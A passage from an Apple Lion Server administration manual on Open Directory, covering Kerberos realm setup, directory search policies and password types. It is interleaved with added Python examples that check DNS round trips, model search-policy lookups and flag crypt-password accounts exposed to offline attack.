   Computer ID: Optionally edit the ID you want Active Directory to use for your server. This is the server's NetBIOS name. The name should contain no more than 15 characters, no special characters, and no punctuation. If practical, make the server name match its unqualified DNS host name. For example, if your DNS server has an entry for your server as server.example.com, give your server the name server.
   AD Administrator Username and Password: Enter the user name and password of a user that has authorization to add computers to Active Directory.
16. Click OK and then click Done.
17. Close System Preferences.
18. Open Server Admin and connect to the server.
19. Click the triangle at the left of the server. The list of services appears.
20. From the expanded Servers list, select Open Directory.
21. Click Settings, then click General.
22. Click Join Kerberos to join the server to the Active Directory Kerberos realm.
23. Enter the following information:
   Administrator Name: Enter the Kerberos server administrator's user name.
   Password: Enter the Kerberos server administrator password.
   Realm Name: Enter the realm name of the Kerberos server.
   DNS/Bonjour Name of KDC: Enter the DNS or Bonjour name of the Kerberos server.
24. Click OK.
25. From the Servers list, select SMB.
26. Click Settings, then click General.
27. Verify that the server is now a member of the Active Directory domain. You can change the server's optional description, which appears in the Network Places window on Windows computers.

After setting up an Active Directory domain member, you might want to change access restrictions, logging detail level, code page, domain browsing, or WINS registration. Then if Windows services aren't running, you can start them.


Set up single sign-on Kerberos authentication


Setting up single sign-on Kerberos authentication involves these tasks:
- Make DNS available on the network and configure it to resolve the fully qualified DNS name of the Open Directory master server (or other Kerberos server) to its IP address. Also, configure DNS to resolve the IP address to the server's fully qualified DNS name.
- Have an administrator set up a directory system to host a Kerberos realm. For more information about setting up a Mac server to host a Kerberos realm, see Setting up an Open Directory Kerberos realm.
- Have a Kerberos administrator of an Open Directory master delegate the authority to join servers to the Open Directory master's Kerberos realm. The administrator does not need delegated authority. A Kerberos administrator has implicit authority to join any server to the Kerberos realm. See Delegate authority to join an Open Directory Kerberos realm.
- Have a Kerberos administrator or users with delegated authority join servers to the Kerberos realm, which then provides single sign-on Kerberos authentication for services provided by the servers that have joined. See Join a server to a Kerberos realm.
- Set all computers using Kerberos to the correct date, time, and time zone, and configure them to use the same network time server. Kerberos depends on the clocks of all participating computers being in sync.

When you are configuring an Open Directory master, make sure DNS is correctly configured and running before you start Open Directory service for the first time. If DNS is not configured properly or is not running when you start Open Directory, Kerberos does not function properly. When Open Directory is started for the first time, Kerberos uses DNS to generate configuration settings. If your DNS server is not available when Kerberos is initially started, its configuration is invalid and it does not work properly.

After Kerberos is running and has generated its configuration file, it no longer completely depends on DNS, and changes to DNS do not affect Kerberos.

The individual services of Lion Server do not require configuration for single sign-on or Kerberos. The following services are ready for single sign-on Kerberos authentication on every server with Lion Server that has joined or is an Open Directory master or replica:
- Login window
- Mail service
- AFP
- FTP
- SMB (as a member of an Active Directory Kerberos realm)
- iChat service
- Print service
- NFS
- Xgrid service
- VPN
- Apache web service
- LDAPv3 directory service (on an Open Directory master or replica)

Setting up an Open Directory Kerberos realm

You can provide single sign-on Kerberos authentication on your network by setting up an Open Directory master. You can set up an Open Directory master during initial configuration that follows installation of Lion Server, but if you set up a Mac server to have a different Open Directory role, you can change its role to that of Open Directory master by using Server Admin. For more information, see Set up an Open Directory master and Start Kerberos after setting up an Open Directory master.

A server that is an Open Directory master requires no other configuration to support single sign-on Kerberos authentication for Kerberized services that the server provides. The server can also support single sign-on Kerberos authentication for Kerberized services of other servers on the network. The other servers must be set up to join the Open Directory Kerberos realm. For more information, see Delegate authority to join an Open Directory Kerberos realm, and Join a server to a Kerberos realm.

Important: An Open Directory master requires DNS to be properly configured so it can provide Kerberos and single sign-on authentication. In addition:
- DNS service must be configured to resolve the fully qualified DNS names of all servers (including the Open Directory master) to their IP addresses and to provide the corresponding reverse lookups. For more information about setting up DNS service, see Network Services Administration.
- The Open Directory master server's Network preferences must be configured to use the DNS server that resolves the server's name. (If the Open Directory master server provides its own DNS service, its Network preferences must be configured to use itself as a DNS server.)


Join a server to a Kerberos realm


Using Server Admin, a Kerberos administrator or a user whose account has the properly delegated authority can join a Mac server to a Kerberos realm. The server can join only one Kerberos realm. It can be an Open Directory Kerberos realm, an Active Directory Kerberos realm, or an existing realm based on MIT Kerberos. To join an Open Directory Kerberos realm, you need a Kerberos administrator account or a user account with delegated Kerberos authority. For more information, see Delegate authority to join an Open Directory Kerberos realm.

1. Make sure the server you want to join to the Kerberos realm is configured to access the shared directory domain of the Kerberos server. To confirm, open Directory Utility (located under Account preferences) on the server you want to join to the Kerberos realm, or connect to the server using Directory Utility on another computer. Click Search Policy, then click Authentication and make sure the Kerberos server's directory domain is listed. If it is not listed, see Directory server connections for instructions on configuring access to the directory.
2. Open Server Admin and connect to the server you want to join to the Kerberos realm.
3. Click the triangle at the left of the server. The list of services appears.
4. From the expanded Servers list, select Open Directory.
5. Click Settings, then click General.
6. Confirm that the role is Connected to a directory server, then click Join Kerberos and enter the following information:
   For an Open Directory Kerberos realm or an Active Directory Kerberos realm, choose the realm from the pop-up menu and enter the name and password of a Kerberos administrator or a user with delegated Kerberos authority for the server.
   For an MIT-based Kerberos realm, enter the name and password of a Kerberos administrator, the Kerberos realm name, and the DNS name of the Kerberos KDC server.


Start Kerberos after setting up an Open Directory master


If Kerberos doesn't start when you set up an Open Directory master, you can use Server Admin to start it manually, but first you must fix the problem that prevented Kerberos from starting. Usually the problem is that DNS isn't correctly configured or isn't running.

Note: After you manually start Kerberos, users whose accounts have Open Directory passwords and were created in the Open Directory master's LDAP directory while Kerberos was stopped might need to reset their passwords the next time they log in. A user account is affected only if all recoverable authentication methods for Open Directory passwords were disabled while Kerberos was stopped.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Refresh (or choose View > Refresh) and verify the status of Kerberos as reported in the Overview pane. If Kerberos is running, there's nothing more to do.
5. Use Network Utility (in /Applications/Utilities/) to do a DNS lookup of the Open Directory master's DNS name and a reverse lookup of the IP address. If the server's DNS name or IP address doesn't resolve correctly:
   In the Network pane of System Preferences, look at the TCP/IP settings for the server's primary network interface (usually built-in Ethernet). Make sure the first DNS server listed is the one that resolves the Open Directory server's name.
   Check the configuration of DNS and make sure it's running.
6. In Server Admin, select Open Directory for the master server, click Settings, then click General.
7. Click Kerberize, then enter the following information:
   Administrator Name and Password: You must authenticate as an administrator of the Open Directory master's LDAP directory.
   Realm Name: This field is set to the server's DNS name converted to capital letters. This is the convention for naming a Kerberos realm. If necessary, enter a different name.
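As an added example (not Apple's code and not part of this manual), the script below derives the Kerberos Realm and Search Base defaults that the Open Directory Assistant proposes from the server's DNS name, and performs the forward and reverse lookup check that step 5 above and the single sign-on DNS requirements describe. The host name od.example.com and the address 192.0.2.10 are constructed values; the resolver functions are replaceable so the check can be exercised against a constructed table offline.

```python
"""Open Directory Assistant defaults and the DNS round trip Kerberos needs.

Added example for this manual, not Apple's tooling. The defaults follow the
rules the assistant applies (realm = DNS name in capital letters, search base
derived from the domain portion of the DNS name). Resolver functions are
injectable so the check can run offline against constructed data.
"""
import socket
import sys
from typing import Callable, Dict, List


def default_realm(fqdn: str) -> str:
    """Default Kerberos realm: the server's DNS name converted to capital letters."""
    return fqdn.rstrip(".").upper()


def default_search_base(fqdn: str) -> str:
    """Default LDAP search base suffix: dc= components built from the domain
    portion of the server's DNS name (the host label is dropped)."""
    labels = fqdn.rstrip(".").lower().split(".")
    domain = labels[1:] if len(labels) > 1 else labels
    return ",".join("dc=" + label for label in domain)


def _system_reverse(ip: str) -> str:
    """Default reverse resolver: PTR lookup through the system resolver."""
    return socket.gethostbyaddr(ip)[0]


def table_resolver(table: Dict[str, str]) -> Callable[[str], str]:
    """Build a resolver over a constructed lookup table (for offline testing);
    a miss raises OSError, as the socket resolver functions do."""
    def resolve(key: str) -> str:
        if key not in table:
            raise OSError("no record for %s" % key)
        return table[key]
    return resolve


def check_dns_roundtrip(
    fqdn: str,
    expected_ip: str,
    forward: Callable[[str], str] = socket.gethostbyname,
    reverse: Callable[[str], str] = _system_reverse,
) -> List[str]:
    """Verify both directions the manual requires before Kerberos is started:
    the FQDN resolves to the server's IP address, and that address resolves
    back to the same FQDN. Returns a list of problems; an empty list means OK."""
    problems = []
    name = fqdn.rstrip(".").lower()
    try:
        ip = forward(name)
    except OSError as exc:  # socket.gaierror is an OSError subclass
        return ["forward lookup of %s failed: %s" % (name, exc)]
    if ip != expected_ip:
        problems.append("%s resolves to %s, expected %s" % (name, ip, expected_ip))
    try:
        ptr = reverse(ip)
    except OSError as exc:  # socket.herror is an OSError subclass
        problems.append("reverse lookup of %s failed: %s" % (ip, exc))
        return problems
    if ptr.rstrip(".").lower() != name:
        problems.append("%s resolves back to %s, not %s" % (ip, ptr, name))
    return problems


if __name__ == "__main__":
    # Usage: python od_dns_check.py od.example.com 192.0.2.10  (constructed values)
    host, addr = sys.argv[1], sys.argv[2]
    print("Kerberos Realm default:", default_realm(host))
    print("Search Base default:   ", default_search_base(host))
    issues = check_dns_roundtrip(host, addr)
    for issue in issues:
        print("PROBLEM:", issue)
    print("DNS round trip OK" if not issues else "fix DNS before starting Open Directory")
    sys.exit(1 if issues else 0)
```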


Disable Kerberos after setting up an Open Directory master


If your Open Directory server is in an existing directory environment that has a Kerberos realm running and you want to join it or avoid having a realm conflict, you can disable the Kerberos realm that is created when you set up your Open Directory master. To disable a Kerberos realm on an Open Directory master server:

1. Open Terminal.
2. Enter the following command:
   $ sudo sso_util remove -k -a username -p password -r NAME.OF.KERBEROSREALM
   Replace username, password, and NAME.OF.KERBEROSREALM with the user name and password of the Open Directory administrator and the name of the Kerberos realm that was created when you configured your Open Directory master.

The Open Directory Overview pane of Server Admin should show the Kerberos service status as stopped.


Delegate authority to join an Open Directory Kerberos realm


Using Server Admin, you can delegate the authority to join a server to an Open Directory master server for single sign-on Kerberos authentication. You can delegate authority to user accounts. The accounts you delegate authority to must have a password type of Open Directory and must reside in the LDAP directory of the Open Directory master server. The dependent server you are delegating authority for must use Mac OS X Server v10.3 or later.

Note: If an account with delegated Kerberos authority is deleted and recreated on the Open Directory master server, the new account does not have authority to join the dependent server to the Open Directory master's Kerberos realm. If you want the recreated account to have delegated Kerberos authority, you must add a new Kerberos record for the recreated account.

A Kerberos administrator (that is, an Open Directory LDAP administrator) doesn't need delegated authority to join dependent servers to the Open Directory Kerberos realm. A Kerberos administrator has implicit authority to join any server to the Kerberos realm.

1. In Workgroup Manager, create a computer group in the LDAP directory domain of the Open Directory master server, or select an existing computer group in this directory: To s elect an exis ting computer group, click Accounts or choos e View > Accounts , click the Computer Group button (above the accounts list), and select the computer group to use. If the LDAP server doesnt have a computer group that you want to add the dependent server to, you can create one: a. Click Accounts, then click the Computers button (above the accounts list). b. Click the small globe icon above the list of accounts and use the pop-up menu to open the Open Directory masters LDAP directory. c. Click the lock and authenticate as an adminis trator of the LDAP directory. d. Click the Computers Group button (above the accounts list), then click New Computer Group or choose Server > New Computer Group. e. Enter a list name (for example, Kerberized Servers). 2. Click Members , then click the Add button (+) to open the computer drawer. 3. Drag computers and computer groups from the drawer to the members lis t. 4. Click Save to save changes to the computer group. 5. Click Preferences and make sure the computer group has no managed preference settings. If any item in the array of preference categories has a s mall arrow next to its icon, the item has managed preference settings. To remove managed preferences from an item, click the item, select Not Managed, and click Apply Now. If the item has multiple panes , select Not Managed in each pane, then click Apply Now.

6. To delegate Kerberos authority to user accounts, create the accounts:
a. Make sure you are working in the LDAP directory of the Open Directory master server. If necessary, click the small globe icon and use the pop-up menu to open this directory, then click the lock and authenticate as an administrator of this directory.
b. Click the Users button (on the left), then click New User or choose Server > New User.
c. Enter a name, short name, and password.
d. Make sure "User can access account" and "User may administer this server" are not selected. You can change settings in other panes, but do not change the User Password Type setting in the Advanced pane. A user with delegated Kerberos authority must have an Open Directory password.
7. Click Save to save the new user account.
8. Open Server Admin and connect to the Open Directory master server.
9. Click the triangle at the left of the server. The list of services appears.
10. From the expanded Servers list, select Open Directory.
11. Click Settings, then click General.
12. Confirm that the Role is Open Directory Master, then click Add Kerberos Record and enter the following information:
Administrator Name: Enter the name of an LDAP directory administrator on the Open Directory master server.
Administrator Password: Enter the password of the administrator account you entered.
Configuration Record Name: Enter the fully qualified DNS name.
Delegated Administrators: Enter a short or long name for each user account to which you want to delegate Kerberos authority for the specified server.
13. Click Add, then click Save to delegate Kerberos authority as specified.
To delegate authority for more than one dependent server, repeat this procedure for each one.

Lion Server user management

Open Directory services

Search policies

Open Directory search policies


Each Mac has a search policy, also commonly referred to as a search path, that specifies which directory domains Open Directory can access, such as the computer's local directory domain and a particular shared directory. The search policy also specifies the order in which Open Directory accesses directory domains. Open Directory searches each directory domain and stops searching when it finds a match. For example, Open Directory stops searching for a user record when it finds a record whose user name matches the name it's looking for.

Search policy levels
A search policy can include only the local directory domain, the local directory domain and a shared directory, or the local directory domain and multiple shared directories. On a network with a shared directory, several computers generally access the shared directory. This arrangement can be depicted as a tree-like structure with the shared directory at the top and local directories at the bottom.

Local directory domain search policy
The simplest search policy consists only of a computer's local directory domain. In this case, Open Directory looks for user information and other administrative data only in the local directory domain of each computer. If a server on the network hosts a shared directory, Open Directory does not look there for user information or administrative data because the shared directory is not part of the computer's search policy. The following illustration shows two computers on a network that only search their own local directory domain for administrative data.

Two-level search policies
If one server on the network hosts a shared directory, all computers on the network can include the shared directory in their search policies. In this case, Open Directory looks for user information and other administrative data first in the local directory domain. If Open Directory doesn't find the information it needs in the local directory domain, it looks in the shared directory. The following illustration shows two computers and a shared directory domain on a network. The computers are connected to the shared directory domain and have it in their search policy.

Here's a scenario in which a two-level search policy might be used:

Each class (English, math, science) has its own computer. The students in each class are defined as users in the local domain of that class's computer. All three of these local domains have the same shared domain, in which all instructors are defined. Instructors, as members of the shared domain, can log in to all class computers. The students in each local domain can log in to only the computer where their local account resides. Local domains reside on their respective computers, but a shared domain resides on a server accessible from the local domain's computer. When an instructor logs in to any of the three class computers and cannot be found in the local domain, Open Directory searches the shared domain. In the following example, there is only one shared domain, but in more complex networks, there may be more shared domains.

Multilevel search policies
If more than one server on the network hosts a shared directory, the computers on the network can include two or more shared directories in their search policies. As with simpler search policies, Open Directory looks for user information and other administrative data first in the local directory domain. If Open Directory does not find the information it needs in the local directory domain, it searches each shared directory in the sequence specified by the search policy. Here's a scenario in which more than one shared directory might be used:

Each class (English, math, science) has a server that hosts a shared directory domain. Each classroom computer's search policy specifies the computer's local domain, the class's shared domain, and the school's shared domain. The students in each class are defined as users in the shared domain of that class's server, so each student can log in to any computer in the class. Because the instructors are defined in the shared domain of the school server, they can log in to any classroom computer.

You can affect an entire network or a group of computers by choosing the domain in which to define administrative data. The higher the administrative data resides in a search policy, the fewer places it must be changed as users and system resources change. Probably the most important aspect of directory services for administrators is planning directory domains and search policies. These should reflect the resources to share, the users to share them among, and the way you want to manage your directory data.

Automatic search policies
Mac computers can be configured to set search policies automatically. An automatic search policy consists of two parts, one of which is optional:
Local directory domain
Shared LDAP directory (optional)

A computer's automatic search policy always begins with the computer's local directory domain. If a Mac is not connected to a network, the computer searches its local directory domain for user accounts and other administrative data. The automatic search policy then determines whether the computer is configured to connect to a shared local directory domain. The computer can be connected to a shared local directory domain, which can in turn be connected to another shared local directory domain, and so on. A local directory domain connection, if any, constitutes the second part of the automatic search policy. For more information, see Inside a directory domain.

An automatic search policy offers convenience and flexibility, especially for mobile computers. If a computer with an automatic search policy is disconnected from the network, connected to a different network, or moved to a different subnet, the automatic search policy can change. If the computer is disconnected from the network, it uses its local directory domain. If the computer is connected to a different network or subnet, it can change its local directory domain connection. With an automatic search policy, a computer doesn't need to be reconfigured to get directory and authentication services in its new location.

Custom search policies
For example, a custom search policy could specify that an Active Directory domain be searched before an Open Directory server's shared directory domain. Users can configure their computer to log in using their user records from the Active Directory domain and have their preferences managed by group and computer records from the Open Directory domain. A custom search policy generally does not work in multiple network locations or while not connected to a network because it relies on the availability of specific directory domains on the network.
If a portable computer is disconnected from its usual network, it no longer has access to the shared directory domains on its custom search policy. However, the disconnected computer still has access to its local directory domain because it is the first directory domain on every search policy. The portable computer user can log in using a user record from the local directory domain, which can include mobile user accounts. These mirror user accounts from the shared directory domain that the portable computer accesses when it's connected to its usual network.

Search policies for authentication and contacts
A Mac computer has a search policy for finding authentication information and a separate search policy for finding contact information:
Open Directory uses the authentication search policy to locate and retrieve user authentication information and other administrative data from directory domains.
Open Directory uses the contacts search policy to locate and retrieve name, address, and other contact information from directory domains. Address Book uses this contact information, and other applications can be programmed to use it as well.
Each search policy can be automatic, custom, or local directory domain only.
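The lookup rule described in this section (domains consulted in policy order, first match wins, local domain always first) is small enough to model directly. The following is an added illustration, not Apple's code: directory domains are plain dicts of constructed records for the classroom scenario above, and a search policy is an ordered list of (label, domain) pairs. The `shadowed_names` check goes a step beyond the text: it lists short names defined in more than one domain, because a record in an earlier domain silently hides a same-named record further down the policy.

```python
"""Search-policy lookup: domains are consulted in order and the first match wins.

Added illustration, not Apple's code. Directory domains are plain dicts of
constructed records; a search policy is an ordered list of (label, domain)
pairs whose first entry is always the computer's local domain.
"""

# Constructed sample domains for the three-level classroom scenario.
LOCAL_DOMAIN = {
    "root":  {"uid": 0,   "home": "/var/root"},
    "alice": {"uid": 501, "home": "/Users/alice"},            # a local account
}
CLASS_DOMAIN = {
    "bob":   {"uid": 1001, "home": "/Network/Homes/bob"},     # class student
}
SCHOOL_DOMAIN = {
    "carol": {"uid": 5001, "home": "/Network/Homes/carol"},   # instructor
    "alice": {"uid": 5002, "home": "/Network/Homes/alice"},   # same short name as the local alice
}


def local_only_policy(local):
    """Only the computer's local directory domain is searched."""
    return [("local", local)]


def automatic_policy(local, shared=None):
    """Local domain first, then the shared LDAP directory the computer is connected to, if any."""
    policy = [("local", local)]
    if shared is not None:
        policy.append(("shared LDAP", shared))
    return policy


def custom_policy(local, *shared):
    """Local domain first, then shared domains in the administrator's chosen order."""
    return [("local", local), *shared]


def lookup(policy, name):
    """Return (domain_label, record) from the first domain that holds `name`, else None."""
    for label, domain in policy:
        record = domain.get(name)
        if record is not None:
            return label, record          # stop at the first match, as Open Directory does
    return None


def shadowed_names(policy):
    """Names defined in more than one domain: the earlier domain hides the later record."""
    seen = {}
    for label, domain in policy:
        for name in domain:
            seen.setdefault(name, []).append(label)
    return {name: labels for name, labels in seen.items() if len(labels) > 1}


if __name__ == "__main__":
    policy = custom_policy(LOCAL_DOMAIN, ("class", CLASS_DOMAIN), ("school", SCHOOL_DOMAIN))
    print(lookup(policy, "carol"))        # found in the school domain
    print(lookup(policy, "alice"))        # the local record wins
    print(shadowed_names(policy))         # {'alice': ['local', 'school']}
```

With the policy above, the instructor `carol` resolves through the school domain and `bob` through the class domain, while a portable computer running the automatic policy with no shared directory resolves only its local records.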

Lion Server user management

Open Directory services

Authentication

About password types


Each user account has a password type that determines how the user account is authenticated. In a local directory domain, the standard password type is shadow password. For user accounts in the LDAP directory of Lion Server, the standard password type is Open Directory. User accounts in the LDAP directory can also have a password type of crypt password.

Authentication and authorization
Services such as the login window and Apple Filing Protocol (AFP) service request user authentication from Open Directory. Authentication is part of the process by which a service determines whether it should grant a user access to a resource. Usually this process also requires authorization. Authentication proves a user's identity, and authorization determines what the authenticated user is permitted to do. A user typically authenticates by providing a valid name and password. A service can then authorize the authenticated user to access specific resources. For example, file service authorizes full access to folders and files that an authenticated user owns.

You experience authentication and authorization when you use a credit card. The merchant authenticates you by comparing your signature on the sales slip to the signature on your credit card. Then the merchant submits your authorized credit card account number to the bank, which authorizes payment based on your account balance and credit limit.

Open Directory authenticates user accounts, and service access control lists (SACLs) authorize use of services. If Open Directory authenticates you, the SACL for login window determines whether you can log in, then the SACL for AFP service determines whether you can connect for file service, and so on. Some services also determine whether a user is authorized to access specific resources. This authorization can require retrieving other user account information from the directory domain. For example, AFP service needs the user ID and group membership information to determine which folders and files the user is authorized to read from and write to.

Open Directory passwords
When a user's account has a password type of Open Directory, the user can be authenticated by Kerberos or the Open Directory Password Server. Kerberos is a network authentication system that uses credentials issued by a trusted server. Open Directory Password Server supports the traditional password authentication methods that some clients of network services require. Kerberos and Open Directory Password Server do not store the password in the user's account. Instead, they store passwords in secure databases apart from the directory domain, and passwords can never be read. Passwords can only be set and verified. Malicious users might attempt to log in over the network hoping to gain access to Kerberos and Open Directory Password Server. Open Directory logs can alert you to unsuccessful login attempts. (See View Open Directory status and logs.)
Open Directory passwords are required for domain login from a Windows workstation to a Mac server and can be used to authenticate for Windows file service. This type of password can be validated using many authentication methods, including NTLMv2 and NTLMv1. Open Directory passwords are stored in a secure database, not in user accounts. User accounts in the following directory domains can have Open Directory passwords:
The LDAP directory of a Mac server
The local directory domain of a Mac server

Shadow passwords
Shadow passwords support similar authentication methods as Open Directory Password Server, depending on the hash types that are enabled. A shadow password is stored as several hashes in the user account. The attribute that contains the password is protected so it can be read only by the root user account. Only user accounts that are stored in a computer's local directory domain can have a shadow password.

Crypt passwords
A crypt password is stored in a hash in the user account. This strategy, historically named basic authentication, is most compatible with software that must access user records directly. Crypt authentication supports a maximum password length of eight bytes (eight ASCII characters). If a longer password is entered in a user account, only the first eight bytes are used for crypt password validation. Shadow passwords and Open Directory passwords are not subject to this length limit. For secure transmission of passwords over a network, crypt supports the DHX authentication method. Crypt passwords are not stored in clear text; they are concealed and made unreadable by encryption. A crypt password is encrypted by supplying the clear text password with a random number to a mathematical function, known as a one-way hash function. A one-way hash function always generates the same encrypted value from particular input but cannot be used to recreate the original password from the encrypted output it generates.
To validate a password using the encrypted value, Mac OS X Lion applies the function to the password entered by the user and compares it with the value stored in the user account or shadow file. If the values match, the password is considered valid.

Determine which authentication options to use
To authenticate a user, Open Directory must determine which authentication option to use: Kerberos, Open Directory Password Server, or shadow password. The user's account contains information that specifies which authentication option to use. This information is named the authentication authority attribute. Open Directory uses the name provided by the user to locate the user's account in the directory domain. Then Open Directory consults the authentication authority attribute in the user's account and learns which authentication option to use. You can change a user's authentication authority attribute by changing the password type in the Advanced pane of Workgroup Manager, as shown in the following table. For more information, see Change the password type to shadow password.

Password type | Authentication authority | Attribute in user record
Open Directory | Open Directory Password Server and Kerberos (1) | Either or both: ;ApplePasswordServer; or ;Kerberosv5;
Shadow password | Password file for each user, readable only by the root user account | Either ;ShadowHash; or ;ShadowHash;HASHLIST:<list of hash types>
Crypt password | Encoded password in user record | Either ;basic; or no attribute at all

(1) You enable single sign-on Kerberos authentication for a user account in an LDAP directory of Lion Server by setting the account's password type to Open Directory in the Advanced pane of Workgroup Manager.

If the attribute in the user record is ;ShadowHash; without a list of enabled authentication methods, default authentication methods are enabled. The list of default authentication methods is different for Mac OS X Lion. The authentication authority attribute can specify multiple authentication options. For example, a user account with an Open Directory password type normally has an authentication authority attribute that specifies both Kerberos and Open Directory Password Server. A user account doesn't need to include an authentication authority attribute. If a user's account contains no authentication authority attribute, a Mac server assumes a crypt password is stored in the user's account.

Offline attacks on passwords
Because crypt passwords are stored in user accounts, they are potentially subject to attack. User accounts in a shared directory domain are accessible on the network. Anyone on the network who has Workgroup Manager or knows how to use command-line tools can read the contents of user accounts, including crypt passwords stored in them. Open Directory passwords and shadow passwords aren't stored in user accounts, so these passwords can't be read from directory domains. A malicious attacker, or cracker, could use Workgroup Manager or UNIX commands to copy user records to a file. The cracker can then transport this file to a system and use various techniques to decode crypt passwords stored in user records. After decoding a crypt password, the cracker can log in unnoticed with a legitimate user name and crypt password. This form of attack is known as an offline attack because it does not require successive login attempts to gain access to a system.
An effective way to thwart password cracking is to use good passwords and avoid using crypt passwords. A password should contain letters, numbers, and symbols in combinations that can't be easily guessed by unauthorized users. Good passwords should not consist of actual words. They can include digits and symbols (such as # or $), or they can consist of the first letter of all words in a phrase. Use both uppercase and lowercase letters.

Shadow passwords and Open Directory passwords are far less susceptible to offline attack because they are not stored in user records. Shadow passwords are stored in separate files that can be read only by someone who knows the password of the root user account (also known as the system administrator). Open Directory passwords are stored securely in the Kerberos KDC and in the Open Directory Password Server database. A user's Open Directory password can't be read by other users, not even by a user with administrator rights for Open Directory authentication. (This administrator can change only Open Directory passwords and password policies.)

Crypt passwords are not considered secure. They should be used only for user accounts that must be compatible with UNIX clients that require them. Being stored in user accounts, they're too accessible and therefore subject to offline attack. Although stored in an encoded form, they're relatively easy to decode.
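The decision rule in the table above (which tag in the authentication authority attribute selects which authentication option, and that a missing attribute means crypt) can be turned into an audit check for the exposure described under "Offline attacks on passwords". The following is an added example, not Apple's code. The tags are the ones the table lists; in a real record the data after a tag (Password Server key and address, Kerberos principal and realm) varies and is not interpreted here, and every sample value is constructed.

```python
"""Classify a user record by its authentication authority attribute.

Added example, not Apple's code. The tags (;ApplePasswordServer;, ;Kerberosv5;,
;ShadowHash;, ;basic;) are those in the password type table. The data that
follows a tag in a real record varies and is ignored; sample values are
constructed.
"""

OPTION_NAMES = {
    "ApplePasswordServer": "Open Directory Password Server",
    "Kerberosv5": "Kerberos",
}


def parse_value(value):
    """Split one attribute value such as ';ShadowHash;HASHLIST:<SALTED-SHA1>' into (tag, data)."""
    if not value.startswith(";"):
        raise ValueError(f"malformed authentication authority value: {value!r}")
    tag, _, data = value[1:].partition(";")
    return tag, data


def assess_record(authority_values):
    """Describe how the account is authenticated and where its password is kept.

    `authority_values` is the (multi-valued) attribute as a list of strings;
    an empty list means the record has no authentication authority attribute.
    """
    tags = dict(parse_value(v) for v in authority_values)

    if any(t in OPTION_NAMES for t in tags):
        return {
            "password_type": "Open Directory",
            "authentication_options": [OPTION_NAMES[t] for t in OPTION_NAMES if t in tags],
            "enabled_hashes": None,
            "stored_in_user_record": False,   # kept in the KDC / Password Server database
        }
    if "ShadowHash" in tags:
        data = tags["ShadowHash"]
        hashes = None                          # None: the default hash list applies
        if data.startswith("HASHLIST:"):
            hashes = [h for h in data[len("HASHLIST:"):].strip("<>").split(",") if h]
        return {
            "password_type": "shadow",
            "authentication_options": ["shadow password"],
            "enabled_hashes": hashes,
            "stored_in_user_record": False,   # separate file, readable only by root
        }
    if not tags or set(tags) == {"basic"}:
        return {
            "password_type": "crypt",
            "authentication_options": ["crypt password"],
            "enabled_hashes": None,
            "stored_in_user_record": True,    # readable from the directory: offline-attack exposure
        }
    raise ValueError(f"unrecognized authentication authority tags: {sorted(tags)}")


def records_exposed_to_offline_attack(records):
    """Names of records whose password hash can be read from the directory domain."""
    return [name for name, values in records.items()
            if assess_record(values)["stored_in_user_record"]]


# Constructed sample records, one per password type (values are not real keys).
SAMPLE_RECORDS = {
    "jsanchez": [";ApplePasswordServer;0x0a0b0c,1024 35 1234:192.0.2.10:3659",
                 ";Kerberosv5;;jsanchez@MYREALM.EXAMPLE.COM;MYREALM.EXAMPLE.COM;"],
    "localadmin": [";ShadowHash;HASHLIST:<SALTED-SHA1,SMB-NT>"],
    "oldunix": [";basic;"],
    "legacy": [],
}

if __name__ == "__main__":
    for name, values in SAMPLE_RECORDS.items():
        print(name, assess_record(values))
    print("exposed:", records_exposed_to_offline_attack(SAMPLE_RECORDS))
```

Run over an export of user records, `records_exposed_to_offline_attack` lists exactly the accounts the text says to migrate away from crypt passwords.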

Lion Server user management

Open Directory services

Authentication

Single sign-on authentication


Lion Server uses Kerberos for single sign-on authentication, which relieves users from entering a name and password separately for every service. With single sign-on, a user always enters a name and password in the login window. Thereafter, the user does not need to enter a name and password for AFP service, mail service, or other services that use Kerberos authentication. To take advantage of single sign-on, users and services must be Kerberized (configured for Kerberos authentication) and use the same Kerberos KDC server. User accounts that reside in an LDAP directory of a Mac server and have a password type of Open Directory use the server's built-in KDC. These user accounts are configured for Kerberos and single sign-on. The server's Kerberized services use the server's built-in KDC and are configured for single sign-on. This Mac server KDC can also authenticate users for services provided by other servers. Having more servers with Lion Server use the Mac server KDC requires only minimal configuration.

Kerberos authentication
Kerberos was developed at MIT to provide secure authentication and communication over open networks like the Internet. It's named for the three-headed dog that guarded the entrance to the underworld of Greek mythology. Kerberos provides proof of identity for two parties. It enables you to prove who you are to network services you want to use. It also proves to your applications that network services are genuine, not spoofed. Like other authentication systems, Kerberos does not provide authorization. Each network service determines what you are permitted to do based on your proven identity. Kerberos permits a client and a server to identify each other much more securely than typical challenge-response password authentication methods. Kerberos also provides a single sign-on environment where users authenticate only once a day, week, or other period of time, thereby easing authentication frequency.
Lion Server offers integrated Kerberos support that virtually anyone can deploy. In fact, Kerberos deployment is so automatic that users and administrators may not realize it's deployed. Mac OS X v10.3 and later use Kerberos when someone logs in using an account set for Open Directory authentication. It is the default setting for user accounts in the Mac server LDAP directory. Other services provided by the LDAP directory server, such as AFP and mail service, also use Kerberos automatically. If your network has other servers with Lion Server, joining them to the Kerberos server is easy, and most of their services use Kerberos automatically. Alternatively, if your network has a Kerberos system such as Microsoft Active Directory, you can set up your Mac server and Macs to use it for authentication. Lion Server and Mac OS X v10.3 or later support Kerberos v5. Lion Server and Mac OS X v10.6 or later do not support Kerberos v4.

The Internet is inherently insecure, yet few authentication protocols provide real security. Malicious hackers can use readily available software tools to intercept passwords being sent over a network. Many applications send passwords unencrypted, and these are ready to use as soon as they're intercepted. Even encrypted passwords are not completely safe. Given enough time and computing power, encrypted passwords can be cracked. To isolate passwords on your private network you can use a firewall, but this does not solve all problems. For example, a firewall does not provide security against disgruntled or malicious insiders. Kerberos was designed to solve network security problems. It never transmits the user's password across the network, nor does it save the password in the user's computer memory or on disk. Therefore, even if the Kerberos credentials are cracked or compromised, the attacker does not learn the original password, so he or she can potentially compromise only a small portion of the network.
In addition to superior password management, Kerberos is also mutually authenticated. The client authenticates to the service, and the service authenticates to the client. A man-in-the-middle or spoofing attack is impossible when you are using Kerberized services, and that means users can trust the services they are accessing. Kerberos is available on every major platform, including Mac OS X Lion, Windows, Linux, and other UNIX variants.

Moving beyond passwords
